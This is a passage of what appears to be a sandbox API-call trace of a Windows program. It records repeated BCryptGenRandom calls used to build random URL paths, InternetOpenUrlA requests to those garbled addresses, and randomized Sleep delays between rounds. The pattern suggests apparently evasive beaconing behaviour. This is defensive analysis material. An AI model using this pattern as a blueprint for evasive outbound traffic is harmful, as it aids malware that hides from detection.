0x7ffc5bcc36b0 [0236.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0236.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.498] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.502] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.502] GetProcessHeap () returned 0x440000 [0236.502] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0236.502] lstrcpyA (in: lpString1=0x472900, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0236.502] lstrcatA (in: lpString1="\x81\x03", lpString2="/rVk2q7z8Kfyoaydlut77ptcpsqq9S2c42h93/noawhex7vnRzgr3xcbcfWyh7TiYuqpUum5e7i0i/jysmnNB7r8yigSnutcbo53xLfjlg40XNF3uarfmy/" | out: lpString1="\x81\x03/rVk2q7z8Kfyoaydlut77ptcpsqq9S2c42h93/noawhex7vnRzgr3xcbcfWyh7TiYuqpUum5e7i0i/jysmnNB7r8yigSnutcbo53xLfjlg40XNF3uarfmy/") returned="\x81\x03/rVk2q7z8Kfyoaydlut77ptcpsqq9S2c42h93/noawhex7vnRzgr3xcbcfWyh7TiYuqpUum5e7i0i/jysmnNB7r8yigSnutcbo53xLfjlg40XNF3uarfmy/" [0236.502] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0236.502] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/rVk2q7z8Kfyoaydlut77ptcpsqq9S2c42h93/noawhex7vnRzgr3xcbcfWyh7TiYuqpUum5e7i0i/jysmnNB7r8yigSnutcbo53xLfjlg40XNF3uarfmy/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0236.502] GetProcessHeap () returned 0x440000 [0236.503] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0236.503] GetProcessHeap () returned 0x440000 [0236.503] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0236.503] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0236.503] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0236.503] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0236.504] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0236.504] Sleep (dwMilliseconds=0xf2fb) [0236.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0236.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0236.794] GetProcessHeap () returned 0x440000 [0236.794] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0236.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0236.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0236.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.795] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0236.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26c, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a1b26c) returned 0x0 [0236.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0236.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0236.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0236.805] GetProcessHeap () returned 0x440000 [0236.805] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0236.805] lstrcpyA (in: lpString1=0x473560, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0236.805] lstrcatA (in: lpString1="P²¡\x03", lpString2="/3pgsxB17mpweszfj7GWinUbqg4/uU3uHw33hepzFb809Owyk3G/" | out: lpString1="P²¡\x03/3pgsxB17mpweszfj7GWinUbqg4/uU3uHw33hepzFb809Owyk3G/") returned="P²¡\x03/3pgsxB17mpweszfj7GWinUbqg4/uU3uHw33hepzFb809Owyk3G/" [0236.806] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0236.806] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/3pgsxB17mpweszfj7GWinUbqg4/uU3uHw33hepzFb809Owyk3G/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0236.806] GetProcessHeap () returned 0x440000 [0236.806] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0236.806] GetProcessHeap () returned 0x440000 [0236.806] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0236.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0237.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0237.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0237.081] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0237.081] Sleep (dwMilliseconds=0x13285) [0237.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0237.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0237.306] GetProcessHeap () returned 0x440000 [0237.306] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5070 [0237.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0237.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5071, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x4f5071) returned 0x0 [0237.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0237.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0237.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0237.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, 